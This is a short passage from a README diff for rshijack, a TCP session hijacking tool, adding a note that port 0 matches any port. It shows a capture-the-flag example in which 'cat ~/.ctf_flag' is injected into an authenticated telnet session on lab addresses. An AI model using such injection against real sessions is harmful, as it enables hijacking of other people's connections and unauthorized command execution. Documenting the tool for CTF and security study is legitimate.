kpcyrd/rshijack/README.md

 was waiting until the authentication was done, then inject a tcp packet into the telnet connection:

+    # if you don't know one of the ports use 0 to match any port
     echo 'cat ~/.ctf_flag' | sudo rshijack tap0 172.16.13.20:37386 172.16.13.19:23

 After some attempts this command was accepted and executed by the telnet